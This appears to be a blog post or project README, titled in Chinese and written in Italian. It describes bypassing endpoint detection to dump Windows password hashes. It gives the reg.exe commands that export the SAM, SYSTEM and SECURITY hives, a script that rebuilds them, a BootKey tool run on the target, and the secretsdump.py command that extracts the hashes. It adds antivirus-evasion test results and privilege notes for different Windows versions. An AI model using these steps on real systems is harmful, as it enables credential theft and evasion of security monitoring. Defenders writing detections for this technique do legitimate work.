
Windows绕过EDR实现DumpHash
Attraverso l'uso esteso del programma di sistema whitelisted Reg.exe, aggira abilmente i punti di intercettazione dell'antivirus, realizzando l'obiettivo di bypassare l'EDR per effettuare il DumpHash.
In base ai test reali, questo metodo è efficace contro i sistemi Windows, non è difficile da eseguire e ha valore pratico.
Articoli pratici di questo progetto:
Dopo la pubblicazione dell'articolo, non ho trovato la stessa idea nelle community nazionali ed estere, e pensavo fosse una novità mondiale. Successivamente, in base ai commenti dei fan, questa idea era già stata condivisa da un esperto all'estero: Dumping LSA secrets: a story about task decorrelation
Il codice sorgente e le Release di questo articolo sono pubblicati su GitHub. Condividere non è facile, se lo trovi utile puoi dare una Star, grazie mille!
Sulla macchina target, esegui i comandi per esportare i file .reg
reg.exe export HKLM\SAM C:\Users\Public\sam.reg
reg.exe export HKLM\SYSTEM C:\Users\Public\system.reg
reg.exe export HKLM\Security C:\Users\Public\security.reg
Scarica i file .reg del primo passo sulla macchina locale ed esegui lo script PowerShell RegReduction.ps1 di questo progetto per ripristinare i file binari
.\RegReduction.ps1
Nota: dopo aver scaricato lo script da GitHub, la codifica predefinita è UTF-8; è necessario modificarla in ANSI (GB2312) tramite il Blocco note per poterlo eseguire correttamente

Esegui l'eseguibile BootKey.exe sulla macchina target; il codice sorgente è il file BootKey.c di questo progetto
BootKey.exe

Test di evasione dell'antivirus (2026.5.10): www.virustotal.com

python secretsdump.py -sam SAM.hive -security SECURITY.hive -bootkey <目标机器的BootKey> LOCAL

Questo articolo prevede diverse operazioni chiave, ma i passaggi principali sulla macchina target sono due:
reg.exe export per esportare il contenuto chiave del registro;BootKey.exe per esportare la BootKey del sistema.Sono stati effettuati test anche su sistemi diversi, con i seguenti risultati:
reg.exe export richiede i privilegi SYSTEM, mentre su Windows Server 2022 e versioni precedenti richiede solo privilegi di amministratore standard (non privilegi SYSTEM). Se dopo aver esportato il registro con reg.exe export il file è di soli 1KB, significa che i privilegi non sono sufficienti.BootKey.exe non richiede privilegi di amministratore e la maggior parte degli antivirus testati (nessuno di quelli incontrati finora) non lo rileva.